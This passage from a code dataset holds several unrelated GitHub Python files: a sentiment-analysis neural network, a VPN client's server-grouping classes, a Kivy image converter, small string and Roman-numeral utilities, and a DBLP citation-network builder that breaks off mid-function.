self.model.add(Dense(5,activation=softmax_activation))\n self.model.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n #add the input and output layer here; you can use either tensorflow or pytorch\n\n def 
train_nn(self,batch_size,epochs):\n        reviews_train, reviews_test, ratings_train, ratings_test = train_test_split(self.reviews, self.ratings, train_size=0.75)\n        # use the batch_size/epochs passed in from main() instead of hard-coded values\n        self.model.fit(np.array(reviews_train),np.array(ratings_train),epochs=epochs,batch_size=batch_size,validation_data=(np.array(reviews_test),np.array(ratings_test)))\n\n        # write the training loop here; you can use either tensorflow or pytorch\n        # print validation accuracy\n\n    def predict(self, reviews):\n        #test_reviews=pre_process_rating(reviews)\n        return np.argmax(self.model.predict(np.array(reviews)),axis=-1)\n        # return a list containing all the ratings predicted by the trained model\n\n\n    \n# DO NOT MODIFY MAIN FUNCTION'S PARAMETERS\ndef main(train_file, test_file):\n    \n    batch_size,epochs=128,50\n    train_data=pd.read_csv(train_file)\n    test_data=pd.read_csv(test_file)\n    train_data=over_sample_data(train_data)\n    train_reviews=preprocess_data(train_data)\n    test_reviews=preprocess_data(test_data)\n    train_ratings=pre_process_rating(train_data)\n    test_ratings=pre_process_rating(test_data)\n\n    model=NeuralNet(train_reviews,train_ratings)\n    model.build_nn()\n    model.train_nn(batch_size,epochs)\n\n    return model.predict(test_reviews)\n#main('train','test')","repo_name":"pranjalsaini24/Sentiment-Analysis","sub_path":"Assignment_2/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"22496833457","text":"import random\nimport logging\nimport os\nimport json\nfrom config.paths import CONFIG_DIR\nfrom .vpn_config import VPNServerConfig\nfrom pyhtmlgui import ObservableDict, Observable\n\n\n# common for Servers and Server Collections\nclass VpnServerOrGroup(Observable):\n    def __init__(self, name):\n        super().__init__()\n        self._logger = logging.getLogger(self.__class__.__name__)\n        self.name = name\n        self.identifier = None\n        self.bandwidth_in = 0\n        self.bandwidth_out = 0\n        self.bandwidth_max = 0\n        self.last_connection_failed = False\n\n    @property\n    def is_online(self):\n        return self.bandwidth_in >= 0 and self.bandwidth_out >= 0 and self.bandwidth_max >= 0\n\n    @property\n    def bandwidth_used_mbit(self):\n        if self.bandwidth_in < 0 or self.bandwidth_out < 0:\n            return 0\n        return ( self.bandwidth_in + self.bandwidth_out ) / 2\n\n    @property\n    def bandwidth_used_percent(self):\n        return min( int( 100 / self.bandwidth_max * self.bandwidth_used_mbit), 100)\n\n    @property\n    def bandwidth_available_percent(self):\n        if self.bandwidth_in < 0 and self.bandwidth_out < 0:\n            return 0\n        return 100 - self.bandwidth_used_percent\n\n    @property\n    def country_shortcodes(self):\n        return list(set([s.vpn_server_config.country_shortcode for s in self.get_vpn_servers()]))\n\n    def match_identifier(self, identifier):\n        if self.identifier == identifier:\n            return True\n        return False\n\n    def set_bandwidth(self, bandwidth_in, bandwidth_out, bandwidth_max):\n        changed = False\n        if self.bandwidth_in != bandwidth_in:\n            self.bandwidth_in = bandwidth_in\n            changed = True\n        if self.bandwidth_out != bandwidth_out:\n            self.bandwidth_out = bandwidth_out\n            changed = True\n        if self.bandwidth_max != bandwidth_max:\n            self.bandwidth_max = bandwidth_max\n            changed = True\n        if changed is True:\n            self.notify_observers()\n\n    def get_vpn_servers(self):\n        raise NotImplementedError()\n\n\n# One VPN Server\nclass VpnServer(VpnServerOrGroup):\n    def __init__(self, name):\n        super().__init__(name)\n        self.name = name\n        self.identifier = \"server=%s\" % name\n        self.vpn_server_config = None\n\n    def 
add_config(self, vpnConfig):\n self.vpn_server_config = vpnConfig\n self.bandwidth_max = vpnConfig.bandwidth_mbps\n self.notify_observers()\n\n def search_by_identifier(self, identifer):\n if self.match_identifier(identifer):\n return self\n return None\n\n def match_filter(self, filter):\n filter = filter.lower()\n if self.name.lower().find(filter) != -1:\n return True\n if self.vpn_server_config.country_name.lower().find(filter) != -1:\n return True\n if self.vpn_server_config.city.lower().find(filter) != -1:\n return True\n if self.vpn_server_config.hostname.lower().find(filter) != -1:\n return True\n if self.vpn_server_config.groupname.lower().find(filter) != -1:\n return True\n return False\n\n def __repr__(self, prefix=\"\"):\n s = prefix + 'VPN Server %s\\n' % self.name\n return s\n\n def get_vpn_servers(self):\n \"\"\"\n :rtype: list[VpnServer]\n \"\"\"\n return [self]\n\n def get_ipv6s(self):\n return [ self.vpn_server_config.primary_ipv6 ] + self.vpn_server_config.alternative_ipv6\n def get_ipv4s(self):\n return [ self.vpn_server_config.primary_ipv4 ] + self.vpn_server_config.alternative_ipv4\n\n def __len__(self):\n return 1\n\n\n# common for collections of Servers\nclass VpnGroup(VpnServerOrGroup):\n def __init__(self, name):\n super().__init__(name)\n self.name = name\n self.identifier = None\n\n @property\n def subitems(self):\n raise NotImplementedError()\n\n def search_by_identifier(self, identifer):\n if self.match_identifier(identifer):\n return self\n if identifer in self.subitems.keys():\n return self.subitems[identifer]\n for _, subitem in self.subitems.items():\n r = subitem.search_by_identifier(identifer)\n if r is not None:\n return r\n return None\n\n def match_filter(self, filter):\n for _, subitem in self.subitems.items():\n if subitem.match_filter(filter) is True:\n return True\n return False\n\n def get_vpn_servers(self):\n \"\"\"\n :rtype: list[VpnServer]\n \"\"\"\n servers = []\n for _, subitem in self.subitems.items():\n servers.extend(subitem.get_vpn_servers())\n return servers\n\n def get_ipv6s(self):\n r = []\n for server in self.get_vpn_servers():\n r.extend(server.get_ipv6s())\n return r\n\n def get_ipv4s(self):\n r = []\n for server in self.get_vpn_servers():\n r.extend(server.get_ipv4s())\n return r\n\n\n def __len__(self):\n return len(self.subitems)\n\n\n# the actual server group classes.\n# instanciate Planet, use add_config for add VpnServer config file objects\nclass VpnGroupCity(VpnGroup):\n def __init__(self, name):\n super().__init__(name)\n self.name = name\n self.identifier = \"city=%s\" % name\n self.servers = ObservableDict() # server key is hostname\n\n @property\n def subitems(self):\n return self.servers\n\n def add_config(self, vpnConfig):\n if vpnConfig.hostname not in self.servers:\n self.servers[vpnConfig.hostname] = VpnServer(vpnConfig.hostname)\n self.servers[vpnConfig.hostname].attach_observer(self._on_server_updated)\n self.servers[vpnConfig.hostname].add_config(vpnConfig)\n\n def _on_server_updated(self, sender):\n self.set_bandwidth(\n -1 if len([_ for _,x in self.servers.items() if x.bandwidth_in >= 0]) == 0 else sum([x.bandwidth_in for _,x in self.servers.items() if x.bandwidth_in > 0]),\n -1 if len([_ for _,x in self.servers.items() if x.bandwidth_out >= 0]) == 0 else sum([x.bandwidth_out for _,x in self.servers.items() if x.bandwidth_out > 0]),\n -1 if len([_ for _,x in self.servers.items() if x.bandwidth_max >= 0]) == 0 else sum([x.bandwidth_max for _,x in self.servers.items() if x.bandwidth_max > 0])\n )\n\n def 
__repr__(self, prefix=\"\"):\n s = prefix + 'VPN City \"%s\", %s Servers\\n' % (self.name, self.subitems.__len__())\n for key, item in self.servers.items():\n s += item.__repr__(prefix + \" \")\n return s\n\n\nclass VpnGroupCountry(VpnGroup):\n def __init__(self, name):\n super().__init__(name)\n self.name = name\n self.identifier = \"country=%s\" % name\n self.citys = ObservableDict()\n self.servers = ObservableDict()\n\n\n @property\n def subitems(self):\n return self.citys\n\n def add_config(self, vpnConfig):\n if vpnConfig.city not in self.citys:\n self.citys[vpnConfig.city] = VpnGroupCity(vpnConfig.city)\n self.citys[vpnConfig.city].attach_observer(self._on_city_updated)\n self.citys[vpnConfig.city].add_config(vpnConfig)\n for _, item in self.citys.items():\n self.servers.update(item.servers)\n\n def _on_city_updated(self, sender):\n self.set_bandwidth(\n -1 if len([_ for _, x in self.citys.items() if x.bandwidth_in >= 0]) == 0 else sum([x.bandwidth_in for _, x in self.citys.items() if x.bandwidth_in > 0]),\n -1 if len([_ for _, x in self.citys.items() if x.bandwidth_out >= 0]) == 0 else sum([x.bandwidth_out for _, x in self.citys.items() if x.bandwidth_out > 0]),\n -1 if len([_ for _, x in self.citys.items() if x.bandwidth_max >= 0]) == 0 else sum([x.bandwidth_max for _, x in self.citys.items() if x.bandwidth_max > 0])\n )\n\n def __repr__(self, prefix=\"\"):\n s = prefix + 'VPN Country \"%s\", %s Citys\\n' % (self.name, self.subitems.__len__())\n for key, item in self.citys.items():\n s += item.__repr__(prefix + \" \")\n return s\n\n\nclass VpnGroupZone(VpnGroup):\n def __init__(self, name):\n super().__init__(name)\n self.name = name\n self.identifier = \"zone=%s\" % name\n self.countrys = ObservableDict()\n self.citys = ObservableDict()\n self.servers = ObservableDict()\n\n @property\n def subitems(self):\n return self.countrys\n\n def add_config(self, vpnConfig):\n if vpnConfig.country_name not in self.countrys:\n self.countrys[vpnConfig.country_name] = VpnGroupCountry(vpnConfig.country_name)\n self.countrys[vpnConfig.country_name].attach_observer(self._on_country_updated)\n self.countrys[vpnConfig.country_name].add_config(vpnConfig)\n\n for _, country in self.countrys.items():\n self.citys.update(country.citys)\n for _, city in country.citys.items():\n self.servers.update(city.servers)\n\n def _on_country_updated(self, sender):\n self.set_bandwidth(\n -1 if len([_ for _, x in self.countrys.items() if x.bandwidth_in >= 0]) == 0 else sum([x.bandwidth_in for _, x in self.countrys.items() if x.bandwidth_in > 0]),\n -1 if len([_ for _, x in self.countrys.items() if x.bandwidth_out >= 0]) == 0 else sum([x.bandwidth_out for _, x in self.countrys.items() if x.bandwidth_out > 0]),\n -1 if len([_ for _, x in self.countrys.items() if x.bandwidth_max >= 0]) == 0 else sum([x.bandwidth_max for _, x in self.countrys.items() if x.bandwidth_max > 0])\n )\n\n def __repr__(self, prefix=\"\"):\n s = prefix + 'VPN Zone \"%s\", %s Countrys\\n' % (self.name, self.subitems.__len__())\n for key, item in self.countrys.items():\n s += item.__repr__(prefix + \" \")\n return s\n\n\nclass VpnGroupPlanet(VpnGroup):\n def __init__(self, name=\"earth\"):\n super().__init__(name)\n self.name = name\n self.identifier = \"planet=%s\" % name\n self.zones = ObservableDict()\n self.countrys = ObservableDict()\n self.citys = ObservableDict()\n self.servers = ObservableDict()\n\n @property\n def subitems(self):\n return self.zones\n\n def add_config(self, vpnConfig):\n if vpnConfig.country_name not in self.zones:\n 
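# note: zones are keyed by country name here, so each country effectively forms its own zone\n            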
self.zones[vpnConfig.country_name] = VpnGroupZone(vpnConfig.country_name)\n            self.zones[vpnConfig.country_name].attach_observer(self._on_zone_updated)\n        self.zones[vpnConfig.country_name].add_config(vpnConfig)\n\n        for _, zone in self.zones.items():\n            self.countrys.update(zone.countrys)\n            for _, country in zone.countrys.items():\n                self.citys.update(country.citys)\n                for _, city in country.citys.items():\n                    self.servers.update(city.servers)\n\n    def add_bandwidth_data(self, data):\n        for _, server in self.servers.items():\n            key = server.vpn_server_config.url\n            if key not in data and \"1.\" in key:\n                key = key.replace(\"1.\",\".\")\n            if key in data:\n                server.set_bandwidth(\n                    -1 if int(data[key]['bandwidth_in']) < 0 else int(data[key]['bandwidth_in'] / 1000),\n                    -1 if int(data[key]['bandwidth_out']) < 0 else int(data[key]['bandwidth_out'] / 1000),\n                    -1 if int(data[key]['bandwidth_max']) < 0 else int(data[key]['bandwidth_max'] / 1000)\n                )\n\n    def _on_zone_updated(self, sender):\n        self.set_bandwidth(\n            -1 if len([_ for _, x in self.zones.items() if x.bandwidth_in >= 0]) == 0 else sum([x.bandwidth_in for _, x in self.zones.items() if x.bandwidth_in > 0]),\n            -1 if len([_ for _, x in self.zones.items() if x.bandwidth_out >= 0]) == 0 else sum([x.bandwidth_out for _, x in self.zones.items() if x.bandwidth_out > 0]),\n            -1 if len([_ for _, x in self.zones.items() if x.bandwidth_max >= 0]) == 0 else sum([x.bandwidth_max for _, x in self.zones.items() if x.bandwidth_max > 0])\n        )\n\n    def load_configs_json(self):\n        try:\n            servers_data = json.loads(open(os.path.join(CONFIG_DIR, \"servers.json\"),\"r\").read())\n        except Exception as e:\n            self._logger.error(\"Failed to load config file: %s\" % e)\n            servers_data = []\n\n        for server_data in servers_data:\n            vpn_server_config = VPNServerConfig()\n            vpn_server_config.load(server_data)\n            self.add_config(vpn_server_config)\n\n    def __repr__(self, prefix=\"\"):\n        s = prefix + 'VPN Planet \"%s\", %s Zones \\n' % (self.name, self.subitems.__len__())\n        for key, item in self.zones.items():\n            s += item.__repr__(\" \")\n        return s\n","repo_name":"perfect-privacy/vpn-client","sub_path":"core/vpnconfigs/vpn_groups.py","file_name":"vpn_groups.py","file_ext":"py","file_size_in_byte":12831,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"}
{"seq_id":"41777526817","text":"import tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom kivy.app import App\r\nfrom kivy.base import Builder\r\nfrom kivy.uix.button import Button\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.uix.popup import Popup\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.clock import Clock\r\nfrom kivy.core.window import Window\r\nfrom kivy.config import Config\r\nfrom kivy.properties import ObjectProperty\r\nfrom kivy.uix.spinner import Spinner\r\nfrom kivy.weakmethod import WeakMethod\r\nimport subprocess\r\nimport threading\r\nimport img2pdf\r\nimport fitz\r\nimport time\r\nimport os\r\n\r\n# build (compile) settings\r\ncwd = os.getcwd()\r\nbase_path = os.path.dirname(__file__)\r\nos.environ['Path'] = base_path\r\nos.chdir(base_path)\r\n\r\n# kivy window config\r\nos.environ ['KIVY_GL_BACKEND'] = 'angle_sdl2'\r\nWindow.size = (600, 220)\r\nConfig.set('graphics', 'resizable', 0)\r\n\r\n# file path list (global)\r\ninput_paths=[]\r\n\r\n\r\nclass MyLayout(Widget):\r\n    item_list = ObjectProperty(None)\r\n    label_text = ObjectProperty(None)\r\n    input_text = ObjectProperty(None)\r\n\r\n    def __init__(self, **kwargs):\r\n        super(MyLayout, self).__init__(**kwargs)\r\n        
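# poll every 0.7 s so the extension labels stay in sync with the selected files\r\n        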
Clock.schedule_interval(self.my_callback, 0.7)\r\n        self.add_widget(Decoration())\r\n    \r\n    # poll the input/output file extensions in a loop\r\n    def my_callback(self, dt):\r\n        if len(input_paths) > 0:\r\n            self.ids.input_path.text = str(input_paths)\r\n        try:\r\n            self.ids.output_ext.text = self.ids.item_list.text\r\n            out = eval(self.ids.input_path.text)\r\n            self.ids.input_ext.text = os.path.splitext(out[0])[1]\r\n        except:\r\n            self.ids.input_ext.text = '未入力'\r\n\r\n    def change_condition(self, dt):\r\n        self.ids.run_botton.disabled = False\r\n        self.ids.condition.text = 'Ready'\r\n\r\n    def clock_run(self):\r\n        Clock.schedule_once(self.change_condition, 3)\r\n\r\n    def convert(self, cmd):\r\n        subprocess.run(cmd)\r\n        self.ids.condition.text = 'Finished'\r\n        self.clock_run()\r\n\r\n    def singul_pdf_output_convert(self, out_dir, out_name, fullpath):\r\n        with open(f\"{out_dir}{out_name}.pdf\",\"wb\") as f:\r\n            f.write(img2pdf.convert([fullpath]))\r\n        self.ids.condition.text = 'Finished'\r\n        self.clock_run()\r\n\r\n    def singul_pdf_input_convert(self, pages, out_dir, out_name):\r\n        for page in pages:\r\n            pix = page.get_pixmap()\r\n            pix.save(f\"{out_dir}{out_name}_%i.png\" % (page.number+1))\r\n        self.ids.condition.text = 'Finished'\r\n        self.clock_run()\r\n\r\n    def multi_pdf_output_convert(self, filename, out_dir, fullpath):\r\n        with open(f\"{out_dir}{filename}.pdf\",\"wb\") as f:\r\n            f.write(img2pdf.convert([fullpath]))\r\n        self.ids.condition.text = 'Finished'\r\n        self.clock_run()\r\n\r\n    def multi_pdf_input_convert(self, pages, out_dir, filename):\r\n        for page in pages:\r\n            pix = page.get_pixmap()\r\n            pix.save(f\"{out_dir}{filename}_%i.png\" % (page.number+1))\r\n        time.sleep(1)\r\n        self.ids.condition.text = 'Finished'\r\n        self.clock_run()\r\n\r\n    def run_button(self):\r\n        global input_paths\r\n        out_extension = self.ids.item_list.text\r\n        out_dir = self.ids.output_path.text + '/'\r\n\r\n        if out_extension == '選択...' 
:\r\n            self.popup_open()\r\n            return None\r\n        \r\n        try:\r\n            fullpath = input_paths[0]\r\n            path = os.path.splitext(os.path.basename(input_paths[0]))\r\n            filename = path[0]\r\n            input_ext = path[1]\r\n        except:\r\n            self.InputErrorPopupMenu()\r\n            return None\r\n\r\n        if input_ext not in ['.png', '.PNG', '.jpeg', '.JPEG', '.jpg', '.JPG', '.webp', '.Webp', '.WebP', '.WEBP', '.pdf', '.PDF', '.gif', '.GIF']:\r\n            self.Input_EXT_ErrorPopupMenu()\r\n            return None\r\n\r\n        out_name = str(self.ids.out_name.text)\r\n\r\n        # (error) input and output extensions are identical\r\n        if input_ext == out_extension:\r\n            self.popup_open2()\r\n            return None\r\n\r\n        if (out_extension in ['.png', '.jpeg', '.webp']) and (input_ext in ['.gif', '.GIF']):\r\n            self.GIF_CONVERT_ErrorPopupMenu()\r\n            return None\r\n\r\n        if (out_extension in ['.jpeg', '.webp'] and (input_ext in ['.pdf', '.PDF'])):\r\n            self.PDF_CONVERT_ErrorPopupMenu()\r\n            return None\r\n        \r\n        # if no output file name was entered (empty string), reuse the input name\r\n        if out_name == '':\r\n            out_name = filename\r\n\r\n        if out_dir == '/':\r\n            out_dir = cwd + '/'\r\n        \r\n        self.ids.run_botton.disabled = True\r\n\r\n        # multiple files\r\n        if len(input_paths) != 1:\r\n            for i in range(len(input_paths)):\r\n                fullpath = input_paths[i]\r\n                path = os.path.splitext(os.path.basename(input_paths[i]))\r\n                filename = path[0]\r\n                input_ext = path[1]\r\n\r\n                # output is PDF\r\n                if (out_extension == '.pdf') or (input_ext in ['.gif', '.GIF']):\r\n                    th = threading.Thread(target=self.multi_pdf_output_convert, args=(filename, out_dir, fullpath))\r\n                    th.start()\r\n                \r\n                # input is PDF\r\n                elif input_ext in ['.pdf', '.PDF']:\r\n                    pages = fitz.open(fullpath)\r\n                    th = threading.Thread(target=self.multi_pdf_input_convert, args=(pages, out_dir, filename))\r\n                    th.start()\r\n                \r\n                # everything else\r\n                else:\r\n                    cmd = f'ffmpeg -y -i \\\"{fullpath}\\\" \\\"{out_dir}{filename}{out_extension}\\\"'\r\n                    th1 = threading.Thread(target=self.convert, args=(cmd,))\r\n                    th1.start()\r\n\r\n        # single file\r\n        else:\r\n            # output is PDF ('.gif' or '.GIF' always evaluated to '.gif'; use a membership test instead\r\n            if out_extension == '.pdf' or (input_ext in ('.gif', '.GIF')):\r\n                th = threading.Thread(target=self.singul_pdf_output_convert, args=(out_dir, out_name, fullpath,))\r\n                th.start()\r\n\r\n            # input is PDF\r\n            elif input_ext in ['.pdf', '.PDF']:\r\n                pages = fitz.open(fullpath)\r\n                th = threading.Thread(target=self.singul_pdf_input_convert, args=(pages, out_dir, out_name,))\r\n                th.start()\r\n            \r\n            else:\r\n                cmd = f'ffmpeg -y -i \\\"{fullpath}\\\" \\\"{out_dir}{out_name}{out_extension}\\\"'\r\n                th1 = threading.Thread(target=self.convert, args=(cmd,))\r\n                th1.start()\r\n\r\n    def popup_open(self):\r\n        content = PopupMenu(popup_close=self.popup_close)\r\n        self.popup = Popup(title='RUN ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n        self.ids.condition.text = 'Error'\r\n        self.ids.run_botton.disabled = True\r\n        self.clock_run()\r\n        self.popup.open()\r\n\r\n    def popup_open2(self):\r\n        content = PopupMenu2(popup_close=self.popup_close)\r\n        self.popup = Popup(title='EXT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n        self.ids.condition.text = 'Error'\r\n        self.ids.run_botton.disabled = True\r\n        self.clock_run()\r\n        self.popup.open()\r\n\r\n    def InputErrorPopupMenu(self):\r\n        content = InputErrorPopupMenu(popup_close=self.popup_close)\r\n        self.popup = Popup(title='INPUT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n        self.ids.condition.text = 'Error'\r\n        self.ids.run_botton.disabled = True\r\n        self.clock_run()\r\n        self.popup.open()\r\n\r\n    def Input_EXT_ErrorPopupMenu(self):\r\n        content = 
Input_EXT_ErrorPopupMenu(popup_close=self.popup_close)\r\n        self.popup = Popup(title='INPUT_EXT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n        self.popup.open()\r\n        self.ids.condition.text = 'Error'\r\n        self.ids.run_botton.disabled = True\r\n        self.clock_run()\r\n\r\n    def PDF_CONVERT_ErrorPopupMenu(self):\r\n        content = PDF_CONVERT_ErrorPopupMenu(popup_close=self.popup_close)\r\n        self.popup = Popup(title='PDF_CONVERT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n        self.popup.open()\r\n        self.ids.condition.text = 'Error'\r\n        self.ids.run_botton.disabled = True\r\n        self.clock_run()\r\n\r\n    def GIF_CONVERT_ErrorPopupMenu(self):\r\n        content = GIF_CONVERT_ErrorPopupMenu(popup_close=self.popup_close)\r\n        self.popup = Popup(title='GIF_CONVERT ERROR', content=content, size_hint=(0.6, 0.6), auto_dismiss=False)\r\n        self.popup.open()\r\n        self.ids.condition.text = 'Error'\r\n        self.ids.run_botton.disabled = True\r\n        self.clock_run()\r\n\r\n    def popup_close(self):\r\n        self.popup.dismiss()\r\n\r\n\r\nclass SpinnerButton(Button):\r\n    pass\r\n\r\nclass PopupMenu(BoxLayout):\r\n    popup_close = ObjectProperty(None)\r\n\r\nclass PopupMenu2(BoxLayout):\r\n    popup_close = ObjectProperty(None)\r\n\r\nclass InputErrorPopupMenu(BoxLayout):\r\n    popup_close = ObjectProperty(None)\r\n\r\nclass Input_EXT_ErrorPopupMenu(BoxLayout):\r\n    popup_close = ObjectProperty(None)\r\n\r\nclass PDF_CONVERT_ErrorPopupMenu(BoxLayout):\r\n    popup_close = ObjectProperty(None)\r\n\r\nclass GIF_CONVERT_ErrorPopupMenu(BoxLayout):\r\n    popup_close = ObjectProperty(None)\r\n\r\nclass MySpinner(Spinner):\r\n    option_cls = ObjectProperty(SpinnerButton)\r\n\r\nclass PathButton(Button):\r\n    @staticmethod \r\n    def get_path():\r\n        global input_paths\r\n        input_paths = []\r\n\r\n        root = tk.Tk()\r\n        root.withdraw()\r\n        pts = filedialog.askopenfilenames()\r\n        for pt in pts:\r\n            input_paths.append(pt)\r\n        return str(pts)\r\n\r\nclass OutPathButton(Button):\r\n    @staticmethod \r\n    def get_path():\r\n        root = tk.Tk()\r\n        root.withdraw()\r\n        out_dir = filedialog.askdirectory()\r\n        return out_dir\r\n\r\nclass Decoration(Widget):\r\n    pass\r\n\r\n\r\nclass MyApp(App):\r\n    def build(self):\r\n        self.title = 'Image-Converter'\r\n        # load the kv layout file\r\n        Builder.load_file(\"img_conv.kv\")\r\n        self.icon = base_path + '\\main.ico'\r\n        return MyLayout()\r\n\r\nif __name__ == '__main__':\r\n    MyApp().run()","repo_name":"natyosu3/ImageConverter","sub_path":"image_converter.py","file_name":"image_converter.py","file_ext":"py","file_size_in_byte":10285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"16702258818","text":"\nvows = ['у', 'е', 'ы', 'а', 'о', 'э', 'я', 'и', 'ю', 'ё']\ncons = ['й', 'ц', 'к', 'н', 'г', 'ш', 'щ', 'з', 'х', 'ъ', 'ф', 'в', 'п', 'р', 'л', 'д', 'ж', 'ч', 'с', 'м', 'т', 'ь', 'б']\n\n\ndef vowels(string):\n    summ_vows = 0\n    summ_cons = 0\n    string = string.lower()\n    for vow in string:\n        if vow in vows:\n            summ_vows += 1\n        \n        # only count characters that are actually consonants, so spaces and\n        # punctuation are ignored (the cons list was previously unused)\n        elif vow in cons:\n            summ_cons += 1\n    \n    \n\n\n    print('vows: ', summ_vows, 'cons:', summ_cons)\n    return ''\n\nprint(vowels(input()))","repo_name":"medvedeva-pa/Practice_5","sub_path":"vowels.py","file_name":"vowels.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"29526322628","text":"def convert_roman(number):\r\n    roman=''\r\n    rom_digits = [\"M\", \"CM\", \"D\", \"CD\", \"C\", \"XC\", \"L\", \"XL\", \"X\", \"IX\", \"V\", \"IV\", \"I\"]\r\n    
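# values aligned index-for-index with rom_digits above; greedy descent from M to I (e.g. 1994 -> 'MCMXCIV')\r\n    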
rom_digits_values = [1000,900,500,400,100,90,50,40,10,9,5,4,1]\r\n    digits_amount=13\r\n    for i in range(digits_amount): # apply successive Euclidean divisions to get the value of each digit weight, starting with M and finishing with I\r\n        divisor = rom_digits_values[i]\r\n        digits_to_add = number // divisor\r\n        number = number % divisor\r\n        roman = roman + digits_to_add * rom_digits[i] # progressively add letters to the string \r\n    return(roman)\r\n\r\n    \r\n##### TEST ##### \r\n\r\ni=int(input('Type a number : '))\r\nprint(\"The roman number is \" + convert_roman(i)) ","repo_name":"louis-lombardi/manatal-roman-numbers","sub_path":"convert_roman.py","file_name":"convert_roman.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"3784515578","text":"import xml\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nimport io\nimport csv\nimport re\nimport configs as cfg\nimport json\nfrom operator import itemgetter\n\nconferenceTier = cfg.conferenceTier\nconferencesName = cfg.conferencesName\nconferencesRegex = cfg.conferencesRegex\n\npublicationsType = [\"article\", \"inproceedings\", \"proceedings\"]\n\npublicationKeys = [\"author\", \"title\", \"year\", \"volume\",\n                   \"booktitle\", \"journal\", \"crossref\", \"school\"]\n\ndataHeader = [\"publtype\", \"conftype\", \"confName\", \"key\", \"tier\", \"title\", \"year\",\n              \"booktitle\", \"volume\", \"journal\",\n              \"crossref\"]\n\ndictionary = {}\nconferences = {}\ninproceeds = {}\nauthorsList = {}\n\n\ndef PreprocessConferencesAuthors (dblpFileName, JSONList):\n    parser = make_parser()\n    parser.setFeature(xml.sax.handler.feature_namespaces, 0)\n    Handler = DBLPHandler()\n    parser.setContentHandler(Handler)\n    print(\"PARSE1\")\n    parser.parse(io.open(dblpFileName))\n\n    with open(JSONList[0], 'w+') as json_file:\n        json.dump(conferences, json_file)\n\n    with open(JSONList[1], 'w+') as json_file:\n        json.dump(authorsList, json_file)\n\n    with open(JSONList[2], 'w+') as json_file:\n        json.dump(inproceeds, json_file)\n\n    print(\"done parsing\")\n    return conferences\n\n\ndef CreateNetworks():\n    conferenceInfo = ParseJSONtoDict(\"json/conferencesAndAuthors.json\")\n    authorInfo = ParseJSONtoDict(\"json/authors.json\")\n    inproceedsInfo = ParseJSONtoDict('json/inproceeds.json')\n    print(len(conferenceInfo))\n    print(len(authorInfo))\n    print(len(inproceedsInfo))\n\n    CreateConferenceNetwork(conferenceInfo)\n    print('done conf')\n    CreateAuthorNetwork(authorInfo, inproceedsInfo)\n    print('done auth')\n\n\ndef CreateConferenceNetwork (conferenceInfo):\n    conferenceNodes = []\n    confNodeAttr = []\n    confEdges = []\n    for key, value in conferenceInfo.items():\n        conferenceNodes.append((key, int(value['year']), value['conftype'],\n                                int(value['tier']), len(value['authors'])))\n\n    for key1 in conferenceNodes:\n        conf1 = key1[0]\n        conf1year = key1[1]\n        if conf1[:-4] == 'pvldb':\n            conf1 = 'vldb' + conf1[-4:]\n\n        confNodeAttr.append((conf1, {'size': key1[4], 'tier': key1[3], 'year': key1[1],\n                                     'authors': conferenceInfo[key1[0]]['authors']}))\n\n\n        for key2 in conferenceNodes:\n            conf2 = key2[0]\n            conf2year = key2[1]\n            if conf2[:-4] == 'pvldb':\n                conf2 = 'vldb' + conf2[-4:]\n\n            weight = 0\n            if conf1 != conf2 and conf1year < conf2year:\n                # can use set and intersect\n                z = set(conferenceInfo[key1[0]]['authors']).intersection(set(conferenceInfo[key2[0]]['authors']))\n                # key1 (not the undefined name key) holds the tier of the earlier conference\n                if key1[3] == 1:\n                    weight = len(z) * 3\n                elif key1[3] == 2:\n                    weight = len(z) * 2\n                elif key1[3] == 3:\n                    
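# tier-3 overlaps carry the smallest edge weight\n                    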
weight = len(z) * 1\n confEdges.append((conf1, conf2, weight))\n\n SaveNodesEdgesinJSON(confNodeAttr, confEdges,'conference')\n\n\n\ndef CreateAuthorNetwork (authorsInfo, inproceedsInfo):\n authNodes = []\n authEdges = []\n\n for author, publications in authorsInfo.items():\n reputation = 0\n prevTier1Year = 2100\n tier1cnt = 0\n publications.sort(key=itemgetter('year'))\n prevPubl = None\n success = 0\n maxSuccess = 0\n for publ in publications:\n if publ['tier'] == 1:\n reputation += 3\n elif publ['tier'] == 2:\n reputation += 2\n elif publ['tier'] == 3:\n reputation += 1\n\n\n if publ['tier'] == 1:\n if prevPubl is not None:\n if int(publ['year']) - prevTier1Year <= 1:\n success += 1\n elif int(publ['year']) - prevTier1Year > 1:\n if success > maxSuccess:\n maxSuccess = success\n success = 0\n \n tier1cnt += 1\n prevPubl = publ\n prevTier1Year = int(publ['year'])\n\n if success > maxSuccess:\n maxSuccess = success\n authNodes.append((author, {'size': len(publications), 'success': maxSuccess, 'tier1cnt': tier1cnt,\n 'reputation': reputation,\n 'start': int(publications[0]['year']),\n 'end': int(publications[len(publications)-1]['year']),\n 'publ': publications}))\n\n for key, publ in inproceedsInfo.items():\n authors = publ['authors']\n authorcheck = set()\n for author1 in authors:\n authorcheck.add(author1)\n for author2 in authors:\n if author1 != author2 and author2 not in authorcheck:\n authEdges.append((author1, author2, {'tier': int(publ['tier']), 'year':int(publ['year'])}))\n authorcheck.clear()\n\n SaveNodesEdgesinJSON(authNodes, authEdges,'author')\n\n\n# Store data into JSON\ndef SaveNodesEdgesinJSON (nodes, edges, fileName):\n with open('json/'+fileName+'Nodes.json', 'w') as json_file:\n json.dump(nodes, json_file)\n\n with 